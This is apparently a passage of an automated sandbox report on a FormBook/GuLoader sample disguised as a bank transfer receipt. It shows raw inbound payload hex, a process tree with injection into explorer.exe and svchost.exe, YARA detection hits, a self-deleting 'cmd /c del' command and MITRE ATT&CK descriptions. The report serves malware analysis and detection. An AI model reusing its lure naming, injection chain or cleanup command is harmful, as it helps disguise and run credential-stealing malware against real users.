Data Ascii: Qw"q1(PGB;&M3QRgwbVxSW5RTgr;A3k8%jn<![@3m!B-$v$W!ZP=<$.8:.DMlQdR96@u),JU\CGIX`tRR1YXj%
2021-12-15 13:13:49 UTC	154	IN	Data Raw: 32 59 ed ba 37 fd d7 ac 1b ee 40 28 6a 09 a7 5d 8b 80 76 ff 66 cb a2 3f 71 86 39 c4 a3 e0 83 f3 2e ab 84 34 8a 93 8a f7 62 53 4e 4a 25 d9 96 30 03 d4 a4 1a d8 97 69 5c 24 ca 56 b0 1e b6 92 75 47 80 93 d6 c6 20 a8 e7 b1 b4 1a 3f ec 5c 49 ce 99 a7 02 54 77 83 a1 81 34 bc a7 90 b1 c9 1a 9a 14 ee f9 b1 b5 ac bf 58 ba cf b2 d9 8f c0 ca 8f bb 87 8f 5e 59 8f 2b df d1 0f a0 32 8d 25 04 fb 2b 36 b9 6a 1d 4f 21 c1 68 78 25 cf 92 d6 0a 6c ff 8f ac b9 e5 47 64 48 7a 4e 2d c7 52 cc 11 07 9c a6 cc 56 eb 5b ba bf 53 5f 36 c6 0e b1 78 1b 58 05 d3 00 be 5f 8a 92 75 5e 26 d9 2a c5 ce 91 94 76 c0 25 97 41 cd b7 06 d7 ce 5b 64 20 dc a1 33 20 ad 2d a6 95 7e ca 89 6c 14 5e 84 14 82 e4 f6 44 bf ae 9e 64 f3 ee 9a 58 d1 89 2d c3 ab d1 f1 51 28 80 cb 87 f2 41 af e6 5d c5 cd d3 9e Data Ascii: 2Y7@(j]vf?q9.4bSNJ%0i\$VuG ?\ITw4X^Y+2%+6jO!hx%lGdHzN-RV[S_6xX_u^&*v%A[d 3 -~l^DdX-Q(A]
2021-12-15 13:13:49 UTC	155	IN	Data Raw: 24 c0 a4 12 f4 fa 8c 6e 3c 9a 14 83 36 67 6b 4a 23 41 ab 25 2e bc a7 6f 39 1b ac d6 70 1f b9 35 04 1f db 3d 7b a4 a2 e3 81 cd 8f a1 89 b2 74 e0 9c b4 b6 3e 28 96 8e af c6 01 77 9c 31 f7 07 1b 60 d4 1c d8 d7 a2 56 2c c4 b8 b0 41 46 dd b3 71 9e c7 1d 5d 17 26 0d 69 c3 1c 73 57 c1 a3 fe 1e 05 1e fe 52 fc 94 53 b5 ce c1 84 b4 54 1d 01 20 be 09 74 ef de 19 c5 b2 a3 e7 fb 9a c8 be 65 dd f9 80 04 29 21 10 09 be 0f dc 15 85 21 cf e9 27 91 16 5a 9e 36 89 a4 6f 77 dd dc 9e 32 7d 9b 08 26 51 af 35 77 17 11 d8 22 40 80 7e e3 a3 a1 1a 7b 16 c2 37 5e 1c 61 b2 8c 2e b1 27 d6 37 10 1c da 2b 17 af 0c 7e 5f 0b 40 e4 5f 0f 6e 17 56 36 0a 4c 5b d0 fb ab 45 58 f5 1a 48 7c 92 80 d1 2a 09 c8 03 f8 3b bd 16 f7 5e 9b 93 56 6f d2 ad f0 e3 e3 72 f0 24 8c 47 30 a2 49 e8 e6 80 95 15 Data Ascii: $n<6gkJ#A%.o9p5={t>(w1`V,AFq]&isWRST te)!!'Z6ow2}&Q5w"@~{7^a.'7+~_@_nV6L[EXH\|*;^Vor$G0I
2021-12-15 13:13:49 UTC	156	IN	Data Raw: 63 c4 98 ca 6f 96 be c5 ce c9 96 48 07 94 bd a0 78 3e bb 50 a6 5f d5 f8 01 41 43 80 ea ed a3 86 dc d4 6f c3 d2 4b 89 80 75 54 ef af 81 6e dc bb 0b 7e a3 bf e2 ce 3d ff 8f 1a 3f 96 65 ed 0b 44 1f 1d cb 42 5b 73 4e 1d a9 6b 40 9e 69 c5 e0 a7 5c 86 8c 93 dd 14 5c a2 c7 3f ed 2c 60 54 a2 79 ba 44 1d ff 66 9c ce 46 a8 64 3c 2b 34 3e 12 1c 5e 91 06 41 34 78 05 ae e0 89 dd a8 29 76 1b b0 71 7e 7a 66 fb 7a d9 c1 db e4 9d eb 5c 45 26 b6 98 5a f6 5f 65 ae 85 7c 01 ed a7 af 0c 5c c9 cc a7 16 43 f1 a8 85 69 ac c9 38 c5 f6 cc c3 f6 a6 77 89 39 37 50 71 65 55 d5 ea da 5a 01 5d 87 51 fb 26 11 d1 4b 7b fe e0 1c 6b 77 ff 37 c5 16 cf 8b f0 b3 21 32 29 bd 6a 8a 3d 4d fb 02 b8 93 9e 12 15 ac 03 40 27 d3 d1 70 d5 f2 4f 36 f0 54 11 c0 8b 1c 60 b2 ef 1f d5 15 03 dc e8 cc da 89 Data Ascii: coHx>P_ACoKuTn~=?eDB[sNk@i\\?,`TyDfFd<+4>^A4x)vq~zfz\E&Z_e\|\Ci8w97PqeUZ]Q&K{kw7!2)j=M@'pO6T`
2021-12-15 13:13:49 UTC	157	IN	Data Raw: 7e b0 2b fa 16 d3 8f 0b f9 62 05 72 18 13 cd aa dd 07 4e 11 09 dc d4 f9 5b e2 40 17 72 de 5a 5b 33 65 b1 85 0f 5e e2 d1 56 dc 89 c3 5c 8a 1b 75 9d e3 5e fc 73 15 f3 53 f5 78 07 bc f6 a6 9c 5a 05 24 0f a3 37 1c 33 fc e8 e6 b7 9c 4b fe 7a da 91 6d 32 a1 e1 f6 6e 00 81 90 84 1b 69 bc 79 9a 99 56 21 bf 40 77 7c 2d 22 b8 e8 0b 13 c7 6a b0 52 cc e5 1a 7c cb 63 57 f7 19 23 5e f3 0f 0d 13 af a7 5f 69 94 68 db 35 04 6d b5 c0 8d b1 f1 b2 3c 20 8c 57 55 89 80 10 15 61 e0 cb 9b 7e d0 58 e3 63 d9 32 0f 71 bf 5c 9e 23 49 2c 92 c7 39 68 e1 a0 d7 7d 22 b0 cf 92 ad 9c 86 7b 1d 6e f9 0a 8b 12 1f ae 1c 76 02 8f 49 c0 a8 cd c7 1b 87 d2 be 67 2a ce fe ba b7 d6 13 70 83 8a 5a 6a fb b9 e7 ca f2 c1 9b c9 25 c3 3e c0 9e ed b1 41 e5 6d 5d c6 60 a3 44 d6 54 f5 52 b7 26 d6 2a e1 de Data Ascii: ~+brN[@rZ[3e^V\u^sSxZ$73Kzm2niyV!@w\|-"jR\|cW#^_ih5m< WUa~Xc2q\#I,9h}"{nvIgpZj%>Am]`DTR&
2021-12-15 13:13:49 UTC	159	IN	Data Raw: 8f 4c 33 8c c3 fe 14 da 68 6f d5 96 94 de 83 2d 95 95 9c 0f e6 cb 92 f0 0c b4 16 c5 31 ad c5 5d d7 7e 7c ee 44 19 55 3d 91 22 4c 54 eb b5 70 08 5b e0 e8 11 7b 11 70 03 61 c3 04 63 96 ee 10 8a d5 55 3b 71 52 46 da b4 29 38 7f 77 1d fa 6f a3 f3 9d 15 0a 5e ba 74 3b 0a 49 d7 08 75 75 a6 ec 8f 40 b2 2f 6f d0 21 48 96 04 b2 ac d8 e4 97 b9 2d 20 21 7d ee 14 b8 a8 f2 9f 34 6f 0f 35 1c 65 f8 fd c1 30 ae f1 0e 89 5c e5 9d 61 47 df d9 62 7d a5 94 75 73 5b b9 79 2b 4d 35 0d 8d b4 28 d8 9a de df c7 df 3a 66 83 3c 70 82 c3 36 78 46 36 3d 12 ac ef 68 e0 cc 8f 06 45 39 64 0e b2 26 bf b3 2a fb 4c 7b 88 a1 7d b4 a4 f4 8c ca 94 17 f2 ea 65 c8 e1 9b 9c 2e f6 39 5a 51 0b 74 0c 38 ea 2a 8a 5b 8f 43 45 44 a9 92 e5 5b f9 bf ee 41 c5 1f 86 db 3d 5b 01 4f 68 29 a1 4e ae cb 3a 62 Data Ascii: L3ho-1]~\|DU="LTp[{pacU;qRF)8wo^t;Iuu@/o!H- !}4o5e0\aGb}us[y+M5(:f<p6xF6=hE9d&L{}e.9ZQt8[CED[A=[Oh)N:b
2021-12-15 13:13:49 UTC	160	IN	Data Raw: ee 4a dc db 81 31 83 85 a2 ad 29 8d 5e e2 4a 6c 7f dd a2 59 c1 bf de c3 37 07 16 c1 8c 40 50 f6 9f 83 9b db c8 aa 6c e4 5b db d3 49 68 61 1e df 37 de 47 8f 66 1c 7f 99 54 7d ec c4 62 36 5d 6d 2b e4 ce f1 ab 4f 42 07 71 2a f6 e0 6b 46 37 aa 94 86 d4 d1 ad b9 3a d5 7b b5 60 92 a9 4d fa d0 c5 20 dc 48 62 79 ca 6a db 39 63 f2 38 4c 09 98 46 76 5c 69 9a 15 1d 7d 4f 88 1c 37 9e d3 d4 e6 d2 60 aa d8 a7 f2 8d ed 9e f5 07 c4 52 b5 8f a9 11 1f 7d c6 f8 80 0f 6e d3 1b 8e 57 17 db fd 16 c1 a2 c1 5b 71 65 90 7e ac 89 a2 50 ec ff 31 0e 2a d7 fd b9 8d 05 b7 48 a5 36 9b 13 f0 5a 0c 14 c6 3f 34 06 dd d0 f9 af 4e 4b cf 93 b3 f6 0b 08 85 e3 1f fe 54 db 88 b1 0f 67 78 9d 07 73 8a ed 71 e6 37 2e dd d6 06 07 8e 14 eb 17 5a 86 64 15 8e ca c1 12 75 d1 bc f3 8a 97 56 08 5d 15 33 Data Ascii: J1)^JlY7@Pl[Iha7GfT}b6]m+OBqkF7:{`M Hbyj9c8LFv\i}O7`R}nW[qe~P1H6Z?4NKTgxsq7.ZduV]3
2021-12-15 13:13:49 UTC	161	IN	Data Raw: 49 46 7e 50 10 e6 7d d5 b6 52 a1 21 67 95 71 1c 93 38 e0 4f 86 6b 5d 16 bf 4d c0 fd 5f 51 d6 b0 ff ac ec de 48 48 43 0a 8a b0 2e ed e2 e0 db 03 9d c3 2e 75 b4 0e d5 a8 e6 39 9c 27 2c 3d f1 0f 64 b8 ae 1f 2b e9 02 6f f7 09 25 80 3e 45 38 f7 96 82 2b 24 f1 9f 65 8f 32 6d e6 ff e9 21 72 91 36 56 d4 de 5e 9e 16 4d 88 9e 5f 8b 16 66 a4 fc e6 80 e1 90 b9 0f b6 97 95 8d cb 99 f0 48 77 8b cd b6 8f 0b 40 17 0b fb c0 d7 44 8b f9 4d cc de 00 cb a7 9f 64 5d bf 35 57 13 65 a9 72 e4 f3 83 a1 fa e4 cc 4d 65 0c df 4c c9 0c 18 84 6a 3b e7 09 03 d9 67 e0 13 af a1 74 46 10 9e 50 38 01 c0 ba 90 46 11 da 6b 8d a8 3b bb a9 48 52 34 86 2a 9f 93 65 39 fc e1 45 25 57 73 ec 46 da 64 0c cc fe 6a d9 53 42 50 ab d9 84 48 95 be 77 6e ed d7 4a fe cd e5 4d 34 e8 ad 44 1d f5 05 cd 09 d4 Data Ascii: IF~P}R!gq8Ok]M_QHHC..u9',=d+o%>E8+$e2m!r6V^M_fHw@DMd]5WerMeLj;gtFP8Fk;HR4*e9E%WsFdjSBPHwnJM4D
2021-12-15 13:13:49 UTC	162	IN	Data Raw: 96 b8 cc 73 6f 8a 89 a1 4b df b5 c3 38 c6 7c f6 dc 41 fe 41 8c 34 a6 a5 17 89 e7 d7 a4 2b ec 73 6f 6b 37 9a a7 b6 0c aa 96 a1 6f 1e 08 d5 10 aa d1 f1 b6 18 dc ee 99 a6 c7 9d aa a9 9b 2e 67 f6 92 41 81 0a 09 b1 37 77 3b b7 10 13 bf 6e a6 14 5c 91 01 df 6f 61 18 ba 20 90 d4 d1 9e ed a3 ea 77 dc fe 6d f7 4b 61 c3 17 ae 39 ba 9b 94 47 f7 f0 20 4b 06 9a bf e1 f7 22 ef ff f9 b0 60 c1 fc 25 c2 47 f8 32 de 6c fb 5f c2 68 1a fd 0d 87 b5 67 df 00 be be 7e c5 ce 61 cd 80 62 c9 39 0b 7a 89 28 51 74 24 71 06 bd ed e9 18 16 d5 02 41 8b 05 b4 d9 ca 6b 5c 33 d3 42 b1 6f ce 69 c7 11 ec 0c f8 00 f9 9f 61 d5 f5 3e d4 e7 81 d3 e2 7e cb 7e bd c8 aa cc 5e 86 60 d4 e1 82 00 98 b1 9f 98 9c 3e 77 da c7 dc 72 cd c7 a0 ce 3d 15 c0 72 48 0e 43 e5 52 09 1b 4c c2 f1 65 e2 a1 69 35 d5 Data Ascii: soK8\|AA4+sok7o.gA7w;n\oa wmKa9G K"`%G2l_hg~ab9z(Qt$qAk\3Boia>~~^`>wr=rHCRLei5
2021-12-15 13:13:49 UTC	163	IN	Data Raw: f0 ed 90 31 c4 d0 00 a2 c6 d0 d1 e9 f1 6f a3 a2 b7 71 41 28 7c 69 49 82 ef 30 db 10 43 d7 5f 48 1f 4f 80 b1 7f 23 bf dd 3b 28 b9 29 1e 7d 80 7e fb ea 96 9e b8 b0 a2 ee 81 de 4c 36 c2 ac 28 45 aa 7d 32 a4 77 ff 9a bc 1f c7 de 71 b0 84 d1 90 b8 1f ea c8 e8 5e 54 ef e0 02 dc 48 42 48 22 7f db 88 95 18 37 36 b8 96 21 5b 18 55 01 1e 97 c9 72 b5 9c c2 6d b6 65 82 ce d2 a6 20 b8 44 fe b0 de 2d e5 55 28 53 2e 06 99 ee fc 81 6c 4a de 3a 4a 81 d6 85 d2 72 f7 94 ce 84 10 eb 7b 7b 03 db 48 c7 b6 85 db 79 7b bb 5d 27 54 65 49 05 ae 85 25 9d 4c f4 ea 9a 63 08 c0 33 b7 42 4a ee 85 63 e6 a2 84 f4 43 15 12 e9 05 44 73 09 08 6a 1d 9f 80 d8 97 19 d1 65 c5 8b 79 52 b6 ef 6d f7 88 09 61 2a c4 fc 2c 54 64 63 4a 97 46 4d a1 03 6d 6b de 8d d2 8d 24 0c a8 11 c4 8b 12 bf 1e 82 98 Data Ascii: 1oqA(\|iI0C_HO#;()}~L6(E}2wq^THBH"76![Urme D-U(S.lJ:Jr{{Hy{]'TeI%Lc3BJcCDsjeyRma*,TdcJFMmk$
2021-12-15 13:13:49 UTC	165	IN	Data Raw: ed 89 58 27 c8 05 0f f9 8b 66 92 75 9c d2 81 cd 09 d6 fd bc 43 ab 23 6c e0 ce 8d 9a 49 9a 09 fe 6a 05 af 9c e2 5b b1 2e 11 54 c4 91 11 10 d4 bc 9a e8 05 d7 03 0a 9c 34 b4 fd 92 dd 03 2c 0b bb 6c 8b 98 8e d8 58 11 4f 78 b9 0c 53 2b 55 ce 6b 6a 85 07 05 ff d2 06 3f 78 99 6e 8e ad 4d b2 ad b5 f4 7a 0f 45 1e d2 65 4f ee 9d c7 72 ad ff 93 78 c7 1b 92 2a 6b 2c b4 53 91 16 e1 36 28 7a cf 33 69 ba d8 c8 c7 f3 3a b3 86 fc 8a c6 40 4e ac 3c 75 81 90 1b e5 9d 56 5a e0 61 9f c7 f5 9d 95 ef 78 75 51 d4 46 11 e6 92 b8 b0 c9 8a 0b da 4e 7b 3e bd 23 10 5c f5 f6 43 b7 a4 9e eb fa 04 92 a5 83 72 22 ea 06 30 1f 48 21 06 de 93 7f 69 92 2f 2d 6f e0 97 a3 10 a2 3c 52 c4 ae 20 14 a5 5d 43 cb ee 41 cc cb 5b 09 26 dd 12 f1 19 d5 be a0 74 5d 4c 67 5d fc d2 9b ac e2 f8 94 36 09 8c Data Ascii: X'fuC#lIj[.T4,lXOxS+Ukj?xnMzEeOrx*k,S6(z3i:@N<uVZaxuQFN{>#\Cr"0H!i/-o<R ]CA[&t]Lg]6
2021-12-15 13:13:49 UTC	166	IN	Data Raw: 77 f2 d5 4b 72 e2 54 3a db d2 88 6b 77 86 62 74 2b 46 ea 5a 56 93 59 1d e7 1c 42 86 a4 e5 52 b7 73 2e cd 79 61 e0 ad 19 f3 8d 0e ab f5 c6 fc 55 26 8a 96 41 87 18 ea cb 50 d1 d3 a1 12 c9 78 9c 0d 5e e0 4f 1f 34 88 f2 20 99 b0 45 2b 3a 45 a6 07 26 0a b0 3f f1 b4 b2 64 66 7a 34 ef af 34 d7 fe 6f 8a 06 02 fb 6a 82 49 49 5e 34 30 dd 74 ef 1d 81 aa ec 36 55 eb 7b 38 a1 76 b2 d0 6c 9f 55 5e 11 1e 72 2a f6 63 1d 70 a0 c7 b2 54 1b 08 25 8b d5 d2 97 b6 56 f5 c1 ff e8 3e 37 24 6f d7 24 0c 10 85 bf b5 0d 16 5c 71 f7 c6 84 20 d1 ce 9e 77 4a 65 78 bd 82 6b 47 a5 00 63 d4 4a 45 9b 39 df 80 ea ff e0 05 c3 4a 99 a0 f9 b9 98 8a a6 0b e5 7b 82 e9 0c 5e a8 19 4d 18 a0 47 d5 2a 51 5e 6e a0 f9 6a 04 03 7c a3 f5 a9 07 05 0a 33 2a 80 b6 69 a1 95 62 6e 13 01 6a d3 49 a2 74 90 59 Data Ascii: wKrT:kwbt+FZVYBRs.yaU&APx^O4 E+:E&?dfz44ojII^40t6U{8vlU^rcpT%V>7$o$\q wJexkGcJE9J{^MGQ^nj\|3*ibnjItY
2021-12-15 13:13:49 UTC	167	IN	Data Raw: af 55 74 01 60 3a 9c 5e 4e 37 61 e4 a0 3c 33 6c dc 44 4a 76 1f 65 78 a6 38 d8 82 e1 e6 c6 7a 0a 5e c1 b3 b1 34 d8 f1 81 4b 02 57 d4 da 9e 7a e0 30 93 78 e5 17 ad 29 a5 a0 42 1f f7 a5 5e d1 3f 44 f0 01 1a 38 07 2d 62 23 90 bb c9 cb 87 0c 45 24 4b 6b d3 37 eb fb 89 22 45 75 3f 43 0c 48 b6 c9 1e 50 c4 f2 11 ce ce 52 17 5b 0f c3 63 d1 d9 3b e7 57 50 22 ef 2f 42 ea 73 12 63 89 9e d6 3a 2b 2a ec d7 ec a2 22 c3 68 8a 71 5f ae ac 0f 4a 41 f9 6d 4d ce 11 c4 a9 0c ab b2 74 7a 32 ad f4 be 34 43 7e ee cb 71 00 55 36 d7 1b 50 c2 9d 45 ef 86 d6 b0 dc 93 c5 1a 8f d8 86 cf d3 ad d5 08 67 ad ab c7 54 28 62 8b 8a ad 23 53 ae 9e d7 a1 37 3b 5b 39 7e 0d 98 e8 2e 4c c7 ab 15 e1 d5 25 cd 7c 16 8f a8 07 3b 8d 17 5e 9d 13 13 b0 ff cf f3 63 72 f2 ae 32 19 c8 a3 98 cb c5 c4 db 4a Data Ascii: Ut`:^N7a<3lDJvex8z^4KWz0x)B^?D8-b#E$Kk7"Eu?CHPR[c;WP"/Bsc:+*"hq_JAmMtz24C~qU6PEgT(b#S7;[9~.L%\|;^cr2J
2021-12-15 13:13:49 UTC	168	IN	Data Raw: 13 d9 24 ce ae 84 0e ed e9 59 d8 d0 35 1d 1b 72 80 a3 a1 ee ed b0 59 ab 18 7d 3d 35 94 00 e7 36 43 17 f8 cc 93 30 0b db 60 79 a4 da 30 fa 87 4e 3a 23 dc 10 4d 73 51 e1 eb 88 04 f2 2b 1a 9f 82 e2 a9 fa cc f2 4e 41 59 30 9a 6f e3 82 ad 12 1e a2 ee 2a 3c fa aa c5 5e 41 58 fd 93 31 03 90 a5 5b 0b f7 b6 7b 54 e2 2a da 5b a4 c0 ac 1e cb bb 2b 95 48 21 33 1f f1 7a 44 ae df 43 c2 3f b1 e3 92 13 b4 32 9f ed 7a 09 04 88 60 25 78 04 58 c2 0c 85 7f ed 30 e9 99 e1 1f 9c 75 fd d3 6e 57 4c 69 99 b7 6a ad c0 6f 76 ee a4 1d bf ca 4b 6d 11 78 13 ba 4f d6 75 c9 fd c4 c9 56 36 5f 28 f9 a6 ec a3 bd 04 e1 da 34 f3 36 6a e5 8a 81 22 79 36 d3 4c 5f 23 f8 f7 32 85 a1 72 03 f3 75 73 69 83 4b 69 2c 6f e0 d4 cc 94 a1 a6 21 9b a0 c8 75 4a ed de 60 cc cb 9f 5b 7a 89 c8 a5 27 dd 9f 4f Data Ascii: $Y5rY}=56C0`y0N:#MsQ+NAY0o<^AX1[{T[+H!3zDC?2z`%xX0unWLijovKmxOuV6_(46j"y6L_#2rusiKi,o!uJ`[z'O

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe PID: 4360 Parent PID: 4884

General

Start time:	14:10:29
Start date:	15/12/2021
Path:	C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Imagebase:	0xf30000
File size:	209920 bytes
MD5 hash:	72A345C95142AEE60E7DF54B570C2C6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: nongrav.exe PID: 6136 Parent PID: 4360

General

Start time:	14:10:30
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	BEB33BD2BF3282F8C86081144236545D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: rundll32.exe PID: 1096 Parent PID: 3352

General

Start time:	14:10:40
Start date:	15/12/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff734500000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: nongrav.exe PID: 4520 Parent PID: 6136

General

Start time:	14:12:08
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	BEB33BD2BF3282F8C86081144236545D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3352 Parent PID: 4520

General

Start time:	14:13:52
Start date:	15/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: svchost.exe PID: 6932 Parent PID: 3352

General

Start time:	14:14:16
Start date:	15/12/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x7ff70d6e0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: cmd.exe PID: 5168 Parent PID: 6932

General

Start time:	14:14:21
Start date:	15/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4456 Parent PID: 5168

General

Start time:	14:14:22
Start date:	15/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

